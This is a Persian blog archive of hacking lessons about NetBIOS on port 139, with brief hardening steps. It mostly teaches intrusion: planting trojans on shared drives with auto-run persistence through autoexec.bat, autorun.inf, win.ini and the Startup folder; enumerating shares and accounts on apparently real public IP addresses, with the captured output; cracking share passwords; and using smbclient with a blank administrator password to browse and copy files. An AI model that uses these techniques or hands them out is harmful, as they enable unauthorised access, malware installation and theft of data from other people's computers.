سفارش تبلیغ
صبا ویژن
دانش خود را به نادانی و یقینتان را به شکّ تبدیل نکنید و چون دانستید، عمل کنید و چون یقین کردید، اقدام کنید . [امام علی علیه السلام]
پاییز 1386 - آرشیو مقالات کامپیوتری
  • پست الکترونیک
  • شناسنامه
  •  RSS 
  • پارسی بلاگ
  • پارسی یار
  • - خلاصه درس: در این درس نکات دیگری راجع به پورت ۱۳۹ می‌آموزیم.

    ◊ چگونه NetBIOS را روی کامپیوتر خودمان فعال یا غیر فعال کنیم؟


    برای غیرفعال کردن NetBIOS در ویندوز با توجه به نوع آن ویندوز روش‌های مختلفی هست. جدول پایینی برای همین موضوع طراحی شده است:

    Win 2000
    Win XP Home
    Win XP Professional

    Start > Programs > Administrative Tools > Local Security Settings > Local Policies > Security Options > Additional restrictions of anonymous connections > Local policy setting > "No access without explicit anonymous permissions" > Ok

    Start > Programs > Administrative Tools > Local Security Settings > Local Policies >
    1) Network Access: Do not allow anonymous enumeration of SAM accounts: Enabled
    2) Network Access: Do not allow anonymous enumeration of SAM accounts and shares: Enabled

    Start > Run > regedit > HKEY_LOCAL_MACHINE > HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > LSA > RestrictAnonymous=2

    می‌تونید به کمک فایروال یا روتر پورت‌های زیر را ببندید:

    135 TCP DCE/RPC Portmapper

    137 TCP/UDP NetBIOS Name Service

    138 TCP/UDP NetBIOS Datagram Service

    139 TCP NetBIOS Session Service

    445 TCP Microsoft-DS (Windows 2000 CIFS/SMB)



    ۱- وقتی پورت ۱۳۹ رو می‌بندید، دیگه نمی‌تونید از NetBIOS استفاده کنید ( مگر اینکه دوباره پورت رو به صورت فعال در‌ آورید). پس وقتی که کسی رو می‌خواهید هک کنید، نیاز دارید که برای مدت کوتاهی دوباره پورت رو فعال کنید.

    ۲- می‌بینید که مثلا برای ویندوز ۲۰۰۰ به سه روش کار کنید، در این جدول فقط کافی است یکی رو اعمال کنید.

    ۳- اگه بعد از غیر فعال کردن، دوباره بخواهید فعال کنید، در مرحله آخر هر یک از روش‌های بالا، گزینه‌ای که مخالف گزینه ذکر شده در جدول است رو انتخاب کنید، مثلا اگه در جدول Enabled را نوشته‌ایم، شما Disable را انتخاب کنید.



    ◊ چگونه از این امکانات به اشتراک گذاشتن، برای اجرای یک تروجان روی کامپیوتر قربانی استفاده کنیم؟


    خوب ما هنوز طریقه استفاده از تروجان رو یاد نگرفتیم ولی سعی می‌کنم تو یکی از درس‌های آینده اونو توضیح بدم. ما اینجا می‌خواهیم از تروجان در رابطه با پورت ۱۳۹ استفاده کنیم. حالا سوال این است که تروجان (trojan) چیست؟
    تروجان به‌طور ساده برنامه‌ای اجرایی است، که ما برای طرف مقابل می‌فرستیم و اگه طرف مقابل اونو اجرا کنه، ما می‌تونیم کنترل سیستم‌ اونو به دست بیاریم. تا اینجا کافی است فعلا ولی بعدا بیشتر توضیح می‌دم.
    حالا همان بحث تروجان ولی در رابطه با پورت ۱۳۹ :
    روش کار به این صورت است که فرضا من الان تونستم یک درایو رو از یک کامپیوتر با پورت باز Share کنم. حالا فایل تروجان ( سرور تروجان ) را upload می‌کنم به اون کامپیوتر و اسمی براش انتخاب می‌کنم که طرف مقابل رو به اجرای فایل تشویق کنه. یک اشتباهی که بعضی‌ها می‌کنند اینه که بعد از کپی کردن تروجان در کامپیوتر هدف، خود هکر می‌آد و فایل رو دابل کلیک می‌کنه، در این حالت تروجان روی کامپیوتر خودمون (هکر) اجرا می‌شه نه کامپیوتر قربانی. پس ما فقط فایل رو می‌فرستیم و منتظر می‌مونیم که طرف مقابل اجرا کنه.

    حالا چند روش رو مطرح می‌کنم که در شرایط خاص حالتی رو ایجاد می‌کنه که نیازی با دابل‌کلیک توسط قربانی نباشد:
    ۱- اگه به درایو C کامپیوتر مقابل دسترسی دارید، یک سطر به فایل autoexec.bat اضافه کنید که نام و مسیر فایل اجرایی را در اون سطر بنویسید. مثلا اگه اسم تروجان ali.exe باشد و در مسیر d:\newfolder باشد، سطری که اضافه می‌کنیم به صورت زیر است:

    d:\newfolder\ali.exe

    در این حالت به محض اولین restart کامپیوتر، تروجان اجرا خواهد شد.
    ۲- اگه به درایو C دسترسی دارید، می‌تونید فایلی به اسم Autorun.inf ایجاد کنید و دستورات زیر را بنویسید ( سطر آخر مطابق با همان تروجان فرضی که در مثال قبل گفتیم، نوشته شده است، اونو با توجه به اسم تروجان و مسیر اون تغییر دهید) :

    [autorun]

    open=d:\newfolder\ali.exe

    ۳- اگه به فولدر ویندوز دسترسی دارید، می‌تونید یک سطر مثل همان مثال قبل ولی برای فایل winstart.bat اجرا کنید. در این حالت هم به محض restart اجرا خواهد شد.
    ۴- اگه به فولدر ویندوز دسترسی دارید، در فایل win.ini و بعد از قسمتی که [windows] نوشته، این سطر رو اضافه کنید:

    run=d:\newfolder\ali.exe

    ۵- اگه به فولدر ویندوز دسترسی دارید، می‌تونید تروجان رو به فولدر Start Menu\Startup اضافه کنید. در این حالت نیازی به ویرایش هیچ فایل دیگری نیست.


    ◊ ابزارهای کمکی: ۱- ابزارهای خط فرمانی


    ۱- enum :
    این برنامه را از اینجا داون‌لود کنید. enum نرم‌افزاری با قابلیت‌های فوق‌العاده است. از جمله توانایی‌هایی که دارد، در مواردی است که کامپیوتر طرف مقابل برای اعمال sharing از ما پسورد بخواد. در این موارد می‌تونیم به کمک enum و لیستی از پسوردهایی که در یک فایل ذخیره شده، تعداد زیادی پسورد رو چک کنیم ( اصطلاحا cracking ) و شاید به نتیجه برسیم. ( این موضوع را بعدا بیشتر توضیح مب‌دم) کاربردی که الان مد نظر ماست، پیدا کردن لیست share هایی است که کامپیوتر مقابل برای ما باز گذاشته است. مثلا من دستور زیر را تایپ کردم، تا لیست اشتراک‌های آن ip خاص در آن لحظه رو بدست بیارم:

    enum -S 217.218.84.29

    و جواب شنیدم:

    server: 217.218.84.29

    setting up session... success.

    enumerating shares (pass 1)... got 10 shares, 0 left:

    E$ IPC$ D$ print$ SharedDocs F$ Printer2 ADMIN$ C$ Printer

    cleaning up... success.

    ملاحظه می‌فرمایید که درایو‌های E و D و F و C و نیز SharedDocs و ... لیست شده است. بقیه مراحل مثل درس ۲۱ است. (دقت کنید که در این حالت نیازی به null session نیست ).

    ۲- nbtscan :
    این برنامه را از اینجا داون‌لود کنید. این برنامه دقیقا معادل nbtstat است ولی با این تفاوت که می‌تونه تعداد زیادی ip رو همزمان تست کنه و لیست share ها رو بدست بیاره. این دقیقا راه‌حلی است برای سوالی که خیلی از شما دوستان پرسیده بودین. مثلا اگه بنویسم:

    nbtscan -v -s : 195.219.49.0-30

    که لیست اشتراک‌ها رو از ip شماره 195.219.49.0 تا 195.219.49.30 بدست میاره. جواب می‌شنوم:

    195.219.49.1 Recvfrom failed: Connection reset by peer

    195.219.49.5 Recvfrom failed: Connection reset by peer

    195.219.49.6 Recvfrom failed: Connection reset by peer

    195.219.49.7 Recvfrom failed: Connection reset by peer

    195.219.49.8 Recvfrom failed: Connection reset by peer

    195.219.49.12 Recvfrom failed: Connection reset by peer

    195.219.49.23:MRS.ZADE :00U

    195.219.49.23:ATINET_MRA :00G

    195.219.49.23:MRS.ZADE :03U

    195.219.49.23:MAC:44-45-53-54-00-00

    195.219.49.28:MAC:44-45-53-54-00-00

    195.219.49.26:KIYARASH-R96L0K:00U

    195.219.49.26:KIYARASH-R96L0K:20U

    195.219.49.26:WORKGROUP :00G

    195.219.49.26:WORKGROUP :1eG

    195.219.49.26:MAC:00-53-45-00-00-00

    195.219.49.22:FARHANG-ZCT780D:00U

    195.219.49.22:FARHANG-ZCT780D:20U

    195.219.49.22:WORKGROUP :00G

    195.219.49.22:WORKGROUP :1eG

    195.219.49.22:MAC:00-53-45-00-00-00

    195.219.49.29:TESSA :00U

    195.219.49.29:WORKGROUP :00G

    195.219.49.29:TESSA :03U

    195.219.49.29:MAC:44-45-53-54-00-00

    195.219.49.25:MAC:44-45-53-54-00-00

    در مورد ip هایی که 20U را می‌بینید، یعنی sharing رو میشه استفاده کرد.

    ۳- winfo :
    اینم از جمله برنامه‌هایی است که باید بگم آخر برنامه است!! از اینجا داون‌لود کنید. البته توانایی تست تعداد زیادی ip رو نداره ولی وقتی یه ip رو تست می‌کنه همه‌چی شو در رو می‌کنه. (البته میشه گفت همه این کارها رو می‌شه با enum هم انجام داد ). مثلا من دستور زیر را تایپ کردم :

    winfo 195.219.49.184 -n -v

    و به نتایج زیر رسیدم:

    Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom

    - http://www.ntsecurity.nu/toolbox/winfo/



    Trying to establish null session...



    Null session established.





    SYSTEM INFORMATION:



    - OS version: 4.0



    DOMAIN INFORMATION:



    - Primary domain (legacy): DSG

    - Account domain: TEHRAN



    Warning: Unable to retrieve domain DNS information.

    Reason : Not supported by the remote OS.





    PASSWORD POLICY:



    - Time between end of logon time and forced logoff: No forced logoff

    - Maximum password age: 42 days

    - Minimum password age: 0 days

    - Password history length: 0 passwords

    - Minimum password length: 0 characters



    LOCOUT POLICY:



    - Lockout duration: 30 minutes

    - Reset lockout counter after 30 minutes

    - Lockout threshold: 0



    SESSIONS:



    - Computer: ARTAWILL-V0P1QR

    - User:



    LOGGED IN USERS:



    * Administrator



    USER ACCOUNTS:



    * Administrator



    - Password age: 666 days

    - Privilege level: Administrator

    - Home directory:

    - Home directory mapped as:

    - Comment: Built-in account for administering the computer/domain

    - Account is: Enabled

    - User can change password: Yes

    - Account is locked out: No

    - Password never expires: Yes

    - The account is: Normal user

    - Logon script path:

    - Full name:

    - User comment:

    - Can log in from workstations: All

    - Last logon to this DC / computer: Mon Mar 03 23:10:23 2003

    - Last logoff from this DC / computer: Tue Dec 11 23:57:37 2001

    - Account expires: Never

    - Max disk space: Unlimited

    - Failed logins in a row to this DC / computer: 0

    - Path to user profile:

    - Password has expired: No



    (This account is the built-in administrator account)



    * Guest



    - Password age: 680 days

    - Privilege level: Guest

    - Home directory:

    - Home directory mapped as:

    - Comment: Built-in account for guest access to the computer/domain

    - Account is: Disabled

    - User can change password: No

    - Account is locked out: No

    - Password never expires: Yes

    - The account is: Normal user

    - Logon script path:

    - Full name:

    - User comment:

    - Can log in from workstations: All

    - Last logon to this DC / computer: None

    - Last logon to this DC / computer: None

    - Account expires: Never

    - Max disk space: Unlimited

    - Failed logins in a row to this DC / computer: 0

    - Path to user profile:

    - Password has expired: No



    (This account is the built-in guest account)



    * TEST



    - Password age: 680 days

    - Privilege level: User

    - Home directory:

    - Home directory mapped as:

    - Comment:

    - Account is: Enabled

    - User can change password: Yes

    - Account is locked out: No

    - Password never expires: No

    - The account is: Normal user

    - Logon script path:

    - Full name:

    - User comment:

    - Can log in from workstations: All

    - Last logon to this DC / computer: None

    - Last logon to this DC / computer: None

    - Account expires: Never

    - Max disk space: Unlimited

    - Failed logins in a row to this DC / computer: 0

    - Path to user profile:

    - Password has expired: Yes



    WORKSTATION TRUST ACCOUNTS:



    INTERDOMAIN TRUST ACCOUNTS:



    SERVER TRUST ACCOUNTS:



    SHARES:



    * ADMIN$



    - Type: Special share reserved for IPC or administrative share

    - Remark: Remote Admin



    * IPC$



    - Type: Unknown

    - Remark: Remote IPC



    * C$



    - Type: Special share reserved for IPC or administrative share

    - Remark: Default share

    بعدا سعی خواهم کرد که در مورد تک تک اینها بحث کنم براتون. ولی به عنوان مثال در آخرها می‌تونین، share ها رو ببینید.

    ۴- NAT :
    این برنامه را از اینجا داون‌لود کنید. یکی از مهم‌ترین کاربرد‌های اون crack کردن پسورد sharing است ( مثل enum ). برای کار با NAT کافی است، بنویسید nat و بعد یک فاصله و بعد ip را می‌نویسیم. حتما تست کنید و نتیجه رو ببینید... ( تکلیف برای خودتون )

    ۵- و ...


    ◊ ابزارهای کمکی: ۲- ابزارهای گرافیکی


    ۱- netbrute :
    این برنامه را از اینجا داون‌لود کنید. من از بین ابزارهای گرافیکی اینو توصیه می‌کنم اگرچه به اندازه دو نرم‌افزار بعدی مشهور نیست. من نمی‌خوام روش کار با اینو توضیح بدم چون خیلی تابلو‌ ه! ضمنا این نرم‌افزار داخل خودش یک پورت اسکنر هم داره که خیلی به درد می‌خوره. حتما حتما حتما داون‌لود کنید اینو و اونقدر انگولکش کنید که سر در بیارین ازش. قرار نیست که همی‌چی رو من بهتون بگم !!

    ۲- Legion :
    اگه بگم مشهورترین نرم‌افزار اسکن کردن پورت‌ ۱۳۹ این نرم‌افزاره، سخن گزافی نیست!! خیلی‌ها کشته مرده اون هستن ولی من زیاد ازش خوشم نمی‌آد. اما باید قبول کرد که کارش واقعا عالیه!!! به هر حال اگه خواستین داول‌لود کنید، اینجا رو کلیک کنید.

    ۳- DumpSec یا DumpACL :
    این هم خیلی معروفه. اگه خواستین می‌تونین از اینجا داون‌لود کنید.



    ◊ آیا چیز دیگه‌ای راجع به این پورت مونده که بحث نشده باشد؟


    بله!
    ۱- یه نرم‌افزاری هست به اسم pqwak که این‌طوری که می‌گن، اگه کامپیوتر مقابل ویندوز ۹۸ باشه، می‌تونه پسورد اونو سه سوت در بیاره. ( این برنامه از نقطه ضعف ویندوز ۹۸ راجع به netbios استفاده می‌کنه و اونو exploit می‌کنه) چون من درسم راجع به هک کردن سرورهاست و نه کلاینت، پس نباید زیاد به درد ما بخوره ( توجه کنید که ویندوز ۹۸ تو کار کلاینت‌اش هم مونده، چه برسه به اینکه سرور باشه! ). خودتون بگردین و اونو اگه می‌خواین پیدا کنید.
    ۲- ما بحث استفاده از نقاط ضعف پورت‌ها رو هنوز شروع نکرده‌ایم و در مورد پورت ۱۳۹ هم همینطوره. به عنوان مثال روش‌هایی هست که پورت ۱۳۹ رو exploit کنیم و اون مراحلی که توش گیر می‌کردیم رو دور بزنیم.
    ۳- نکته آخر راجع به این پورت اینه که مواظب خودتون باشین. حتما ورزش کنین. سیگار نکشین چون برای سلامتی خیلی بده! ( قابل توجه بعضی‌ها) حرف بابا مامانتون رو گوش کنین. اگه کنکور دارین با اینکه دارین مشروط می‌شین، به‌جای هک کردن برین درس بخونین! همین‌ها... باقی بقایت، جانم فدایت ...

    کوچیک ::: سه شنبه 86/7/24::: ساعت 3:0 صبح
    نظرات دیگران: نظر

    - خلاصه درس: با NetBIOS آشنا شده‌ایم. همانطور که می‌دانید برای اینکه از دستورات درس قبل استفاده کنیم، شرطی که داشتیم این بود که علاوه بر کامپیوتر مقابل، کامپیوتر شما هم باید از نسخه‌های ویندوز بوده و نیز NetBIOS در آن فعال باشد. حالا اگه سیستم‌عاملی که خودتون -هکر- استفاده می‌کنید، لینوکس باشد، آیا باز هم می‌شود کاری کرد؟ - آرمین رنجبر در این درس همین سوال رو پاسخ می‌دهد.


    ◊ Samba چیست؟


    احتمالا میدونید که Netbios پرتکل معروف مایکروسافت برای ارتباط ویندوز ها با هم و احتمالا Share کردن پرینتر یا فایله. همچنین وقتی که بحث نفوذ به Client و بر بعضی مواقع Server ها پیش میاد، Netbios یکی از اولین انتخاب هاست. ما در این مقاله سعی میکنیم از این ضعف سیستم عاملهای مایکروسافت سوءاستفاده کنیم.
    سیستم عاملهای بر پاییه یونیکس مثل لینوکس برای Share کردن فایلها و پرینتر ها از طریق Netbios از پرتکل Smb/Cifs که توسط برنامه Samba باز میشه استفاده میکنن و از این طریق لینوکس میتونه Share های کامپیوتر های ویندوز رو Mount کنه. (اگه کاربر لینوکس هستید، نمی‌تونید روش‌هایی که در درس قبلی برای ویندوز ذکر شده استفاده کنید، بلکه باید از Samba بهره گیرید. اما طرف مقابل که قرار است هک بشه، سیستم‌عاملش رو فرض می‌کنیم که ویندوزه. پس ما می‌خوایم با لینوکس یک سیستم‌عامل ویندوز را که ۱۳۹ باز داره، هک کنیم) بی شک Netbios عمومی ترین مشکل امنیتی ویندوزه که استفاده ازش چندان مشکل نیست.
    خب ! همون طور که گفتم ما برای این کار از Samba استفاده میکنیم. من اینجا چیزی در مورد Samba نمی‌نویسم و بنا کار رو بر این میگذارم که تا حدودی میتونید با Samba کار کنید . اگر احتمالا مشکلی دارید میتونید به Samba.org سر بزنید و در Documention ها دنبال راهنما باشید :) به طور کل اگر نمیدونید چطور از Samba استفاده کنید بهتره که کاری با کامپیوتر های مردم نداشته باشید ! :)


    ◊ چگونه با پورت ۱۳۹ صحبت کنیم؟


    ۱- اولین قدم پیدا کردن کامپیوتریه که پرت 139 و 137 که پرت Netbios هست رو باز کرده باشه. برای اینکار از Nmap استفاده می‌کنیم. Nmap معمولا رو همه Description های فعلی پیدا میشه. می‌خوام به کمک Nmap تست کنم که از ip شماره 192.168.3.50 تا 192.168.3.1 کدام‌ها پورت ۱۳۹ باز دارند. برای این کار می‌نویسم:

    # nmap -sS -O 192.168.3.1-50 -p 139

    و جواب می‌شنوم:

    st 1 open and 1 closed TCP port

    Interesting ports on (192.168.3.2):

    Port State Service

    139/tcp open netbios-ssn

    Remote OS guesses: Windows Millennium Edition (Me), Win 2000,
    or WinXP, MS Windows2000 Professional RC1/W2K Advance Server Beta3

    باید اینو بهتون بگم که من دارم این کار رو روی Lan انجام میدم و همه Ip ها Static هستند. ولی خب کار رو جوری در نظر میگیرم که گویا نمیدونم چه Host های اینجا وجود دارن :) 192.168.3.1 یک SuSE 8 هست که کار رو از طریقش انجام میدیم و 192.168.3.2 یک win2kpro sp2 هست که قربانیه و البته FireWall نداره :) من اینجا از آیپی های کلاس C استفاده میکنم ممکنه وضع شما تو اینترنت فرق کنه، ولی خب نحوه کار تغییر نمیکنه. حالا هدف رو پیدا کردیم، هدف ما 192.168.3.2 هست .

    ۲- قدم دوم گرفتن NetbiosName های هدفه. بدون این اسمها ما نمیتونیم هیچ جور اطلاعاتی از هدف بگیریم. از اونجایی که مایکروسافت سعی کرده همه کارها رو ساده کنه، ویندوز های رو شبکه Netbios به جای Ip Address از اسم استفاده میکنن!! خب اینجا لازمه از یه Netbios Scanner یا Share Scanner استفاده کنیم. معمولا رو هر Description یی دستور nmblookup پیدا میشه - که خیلی شبیه nbtstat ویندوزه - رو لینوکس کار میکنه. من شخصا خیلی از nmblookup خوشم نمیاد چون Share Scanner های بسیار بهتری هستن ! :) به هر صورت من اینجا از nmblookup استفاده میکنم . شکل کلی دستور اینه : nmblookup –A . این flag ه A باعث میشه که nmblookup بتونه Query بهتری انجام بده . حالا رو هدفهوم امتحان میکنیم :

    # nmblookup –A 192.168.3.2

    و جواب می‌گیرم:

    Looking up status of 192.168.3.2

    ARMINLAPTOP <00> - B < ACTIVE>

    WORKGROUP <00> - < GROUP> B < ACTIVE>

    ARMINLAPTOP <03> - B < ACTIVE>

    ARMINLAPTOP <20> - B < ACTIVE>

    WORKGROUP <1e> - < GROUP> B < ACTIVE>

    ADMINISTRATOR <03> - B < ACTIVE>

    WORKGROUP <1d> - B < ACTIVE>

    ..__MSBROWSE__. <01> - < GROUP> B < ACTIVE>

    همه چیز مشخصه نه ؟ اسم کامپیوتر ARMINLAPTOP , گروه کامپیوتر WORKGROUP و کاربر فعال Administrator هست :)

    ۳- بگذارین قبل از قسمت سوم کار یکمی در مورد ویندوز ها صحبت کنیم. Netbios به طور کلی روی همه ویندوز ها به نوعی خطر ایجاد میکنه. رو ویندوز های سری 2000 به بالا همه پارتیشن های سیستم Share شده اند و با پسوردی که Administrator دارد، باز میشن. خیلی از کاربران تازه کار هم پسورد Administrator رو خالی میگذارن. به نظر من این سری ویندوز ها بیشتر در خطر هستند. رو ویندوز های 9x هیچ فایلی به طور Default Share نشده، ولی خوب اگر بشه ممکنه بتونیم از طریقش بدون پسورد وارد فایل سیستم بشیم :) حتی اگر پسورد Administrator رو هم نداشته باشیم Anonymous Login میتونه اطلاعات خیلی مفیدی بهموم بده :) حالا می‌خواهیم لیست Share ها رو بدست بیاوریم . ( در درس قبلی برای ویندوز از دستور net view برای همین‌کار استفاده کردیم) توجه کنید که کرنل باید Network File System و Samba File System رو ساپرت کرده باشه : در این مثال در نظر گرفتم که پسورد Administrator خالیه ! :) می‌نویسم:

    # smbclient –Uadministrator –LARMINLAPTOP –I 192.168.3.2

    نتیجه دستور به صورت زیر است:

    added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0

    Password:

    Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]



    Sharename Type Comment

    --------- ---- -------

    IPC$ IPC Remote IPC

    D$ Disk Default share

    ADMIN$ Disk Remote Admin

    C$ Disk Default share

    Armin Disk



    Server Comment

    --------- -------

    ARMINDESKTOP Samba 2.2.3a

    ARMINLAPTOP



    Workgroup Master

    --------- -------

    WORKGROUP ARMINLAPTOP

    خب میبینید ؟ :) هر دو پارتیشن ARMINLAPTOP در اختیار شماست ! :) همچنین کامپیوتر هایی که باهاش در ارتباط هستند رو هم میبینیم. در این مثال ملاحظه می‌فرمایید که Armin به عنوان Disk به‌اشتراک گذاشته شده. خب قبل از اینکه بریم سراغ بقیه کار یک بار هم Anonymous رو امتحان میکنیم ( یه چیزی مثل Null Session ):

    # smbclient -LARMINLAPTOP -I 192.168.3.2

    و جواب:

    added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0

    Password:

    Anonymous login successful

    Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]



    Sharename Type Comment

    --------- ---- -------

    Error returning browse list: NT_STATUS_ACCESS_DENIED



    Server Comment

    --------- -------

    ARMINDESKTOP Samba 2.2.3a

    ARMINLAPTOP



    Workgroup Master

    --------- -------

    WORKGROUP ARMINLAPTOP

    خب باز هم یه اطلاعاتی پیدا میکنیم ! :) با اینکه فایلهای Share شده رو نمیبینیم، به هر صورت از هیچی بهتره ! شاید یه جای دیگه به درد بخوره !

    ۴- خب حالا سعی میکنیم که این Share هارو Mount کنیم. می‌نویسیم:

    # smbclient //ARMINLAPTOP/Armin -I 192.168.3.2

    و جواب می‌شنوم:

    added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0

    Password:

    session setup failed: NT_STATUS_LOGON_FAILURE

    خب ! :) Share توسط Password محافظت میشه ! :) کار زیادی نمی‌تونیم انجام بدیم. مثلا می‌تونیم همین Null پسورد رو امتحان کنم، ولی خب اگر با Win9x طرف باشیم کاری نمیشه کرد . حالا رو ویندوز 2000 به بالا کار می‌کنیم. روی اینکه کاربر ناشی باشه و پسورد Administrator رو خالی گذاشته باشه خیلی حساب کردیم :

    # smbclient //ARMINLAPTOP/Armin -I 192.168.3.2 -Uadministrator

    و جواب می‌شنوم:

    added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0

    Password:

    Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

    smb: \>

    این
    smb: \> ls

    و جواب می‌شنوم:

    . DA 0 Sat Feb 8 05:34:11 2003

    .. DA 0 Sat Feb 8 05:34:11 2003

    Blcorp D 0 Sat Feb 8 03:05:51 2003



    47943 blocks of size 65536. 8261 blocks available

    و ادامه می‌دم به صورت زیر:

    smb: \> cd Blcorp

    smb: \Blcorp\> ls

    . D 0 Sat Feb 8 03:05:51 2003

    .. D 0 Sat Feb 8 03:05:51 2003

    WLTrial.exe A 2321412 Mon Apr 29 14:18:58 2002



    47943 blocks of size 65536. 8261 blocks available

    smb: \Blcorp\> get WLTrial.exe

    getting file WLTrial.exe of size 2321412 as WLTrial.exe (892.2 kb/s) ...

    smb: \Blcorp\>

    شما میتونید از دستور Pull برای فرستادن فایل و get برای گرفتن فایل استفاده کنید :) فایلها گرفته شده در دایرکتوری فعلی شما ذخیره میشوند . قسمت امیدوار کننده کار اینه که خیلی از مردم از ویندوز استفاده میکنن و اکثرشون حتی نمیدونن که همه فایل سیستم هاشون بدون پسورد به راحتی قابل دسترسه. خب ما هم اینهارو یاد نمی‌گیریم که دور دنیا بچرخیم و فایلهای مردم رو پاک کنیم !


    ◊ FAQ


    - آیا Samba به نا امنی Netbios ویندوز است ؟
    نه اصلا ! Samba یک برنامه پرقدرته , اگر خوب Config شه احتمال هک شدنش بسیار پایینه ! فرض کنید از طریق سیستم‌عامل ویندوز می‌خوام این کامپیوتری که Samba داره رو هک کنم. دستور تایپ شده و جواب بدست اومده بیانگر امنیت Samba ست:

    C:\>nbtstat -A 192.168.3.1



    Local Area Connection 2:

    Node IpAddress: [192.168.3.2] Scope Id: []



    Host not found

    - یک نفوذ بدون مشکل جدی چقدر طول می‌کشه ؟
    موقع هک کردن Client باید سریع باشید ! کل این مراحل حداکثر 3 یا 4 دقیقه وقت میگیره , فقط نوشتنش طول میکشه! :)

    - چرا هک کردن Netbios از طریق Unix/Linux راحت تر از Windows هست ؟
    خب خیلی سریع تره، ابزارهای بهتر و از همه مهم‌تر اینکه خودتون در معرض خطر نیستید :)

    کوچیک ::: دوشنبه 86/7/23::: ساعت 3:0 صبح
    نظرات دیگران: نظر

    - خلاصه درس: در این درس با پورت ۱۳۹ ( NetBIOS ) آشنا می‌شویم.

    ◊ چند نکته


    ۱- در تمام درس‌هایی که با عنوان صحبت با پورت‌ها شروع شده است، فقط بحث ارتباط استاندارد با آنها رو گفته‌ام. یعنی نخواستم درباره اینکه چگونه از نقاط ضعف آنها ( اصطلاحا Vulnerability ) سوء‌استفاده کنیم، سخنی به میان بیارم. بحث استفاده از Vulnerability ها و اصطلاحا exploit کردن نرم‌افزارهای هر پورت بعدا مطرح خواهد شد. در مورد این درس هم همین نکته را رعایت کرده‌ام. همین بحث netbios بعدا کامل‌تر خواهد شد.
    ۲- اگه یادتون باشه قبلا گفتم که باید سه مورد را خودتون شروع کنید به یاد گرفتن که عبارت بودند از C ، TCP/IP ، Linux من فرض می‌کنم که شما در این مدت این سه تا رو یاد گرفتین و کم کمک وارد مباحث مربوطه خواهم شد. اگه هنوز اطلاعاتتون کامل نشده، یوخته عجله کنین.
    ۳- مثال‌ مهندسی اجتماعی رو که تو درس ۱۴ برای یاهو گفته بودم، غیر فعال کردم که دیگه user جدید قبول نکنه.
    ۴- سعی می‌کنم تو یکی از درس‌های بعدی طریقه نصب لینوکس و نیز نصب مودم رو در این سیستم‌عامل آموزش بدم چون خیلی ازم می‌پرسن.

    ◊ NetBIOS چیست؟


    NetBIOS مخفف عبارت Network Basic Input/Output System است. NetBIOS ابزاری است که اجازه به اشتراک گذاشتن منابع رو به ما می‌ده. ما برای به اشتراک گذاشتن فایل‌ها و یا پرینتر می‌تونیم از این پروتکل استفاده کنیم. نکته مهم این است که NetBIOS فقط در سیستم‌عامل ویندوز معنی داره (اگرچه ابزارهایی مثل Samba در لینوکس می‌تونن اونو شبیه سازی کنن ولی بحث ما خود پروتکل NetBIOS است). وقتی NetBIOS در ویندوز فعال باشد، بلافاصله سه تا پورت برای استفاده باز می‌شوند. پورت مهم و اصلی پورت ۱۳۹ در tcp است که NetBIOS را هم با این پورت می‌شناسن. دو پورت دیگر، از نوع udp هستند و عبارتند از پورت ۱۳۷ برای name service و پورت ۱۳۹ برای Datagram service . وقتی قرار باشه که یک سیستم‌عامل ویندوز هک بشه ( خصوصا اگه کلاینت باشه ) یکی از اولین مواردی که به ذهن می‌رسه، استفاده از NetBIOS ه.
    حالا ببینیم منظور از به اشتراک گذاشتن (Sharing) در مورد فایل‌ها و پرینتر‌ها چیست؟
    به اشتراک گذاشتن در مورد فایل‌ها یعنی قرار دادن تعدادی فایل در یک کامپیوتر خاص به طوریکه توسط سایر کامپیوترها قابل دسترسی و استفاده باشه. در مورد پرینتر به اشتراک گذاشتن یعنی طوری چاپگر متصل به یک کامپیوتر را تنظیم کنیم که توسط سایر کامپیوتر‌ها هم قابل استفاده باشه. با توجه به اینکه در سیستم‌عامل‌های ویندوز به صورت پیش‌فرض NetBIOS فعال است، پس می‌توان به تعدادی از فایل‌ها و فولدرهای تعدادی از کامپیوترهای روی شبکه دسترسی داشت و فایل‌ها را خواند و حتی کپی یا پاک کرد.


    ◊ چگونه با پورت ۱۳۹ صحبت کنیم؟


    ۱- اولین کاری که می‌کنیم این است که برای پورت ۱۳۹ پورت اسکن می‌کنیم تا ip هایی را که پورت ۱۳۹ در آنها باز است، پیدا کنیم. من این کار را با nmap انجام می‌دم. فرض کنید که یک ip به شماره 217.218.84.29 را تست کرده و به نتیجه زیر برسم:

    Interesting ports on HOME-TU6U0AV86Y (217.218.84.29):

    Port State Service

    139/tcp open netbios-ssn

    Remote operating system guess: Windows Millenn... (Me), Win 2000, or WinXP

    این خروجی اعلام می‌کند که پورت ۱۳۹ باز است. پس می‌شود از این ip استفاده کرد.

    ۲- حالا می‌خوام با این پورت ارتباط برقرار کنم. اصولا باید مثل سابق از telnet یا nc استفاده کنم ولی در مورد پورت ۱۳۹ روش ارتباطی فرق می‌کند. کامنت پرامت را باز کرده و دستور زیر را می‌نویسم:

    nbtstat -A 217.218.84.29

    دستور nbtstat یک ابزار خاص برای کار با NetBIOS است. دقت کنید که از پارامتر A- با ip مربوطه استفاده کردم. (دستور nbtstat دارای پارامتر‌های بسیاری است که اگه می‌خواین همه رو ببینین، بنویسین nbtstat و enter را بزنید.)
    حالا بحث اینه که این دستور چه‌ کاری می‌کنه و خروجی به چه صورتی است:
    این دستور به ip مورد نظر وصل می‌شه و از اون می‌خواد لیست منابعی رو که به اشتراک گذاشته رو لیست کنه. در این حالت ۲ حالت ممکنه اتفاق بیوفته:
    الف) مواجه با پیغام Host not found بشم. این یعنی اینکه نمی‌تونه لیست منابع را از اون کامپیوتر بگیره (یعنی NetBIOS غیر فعاله). یعنی اگرچه پورت ۱۳۹ بازه ولی قابل استفاده نیست.
    ب) ارتباط برقرار بشه و لیست منابع اشتراکی لیست بشه:

    NetBIOS Remote Machine Name Table



    Name Type Status

    ---------------------------------------------

    HOME-TU6U0AV86Y<00> UNIQUE Registered

    MSHOME <00> GROUP Registered

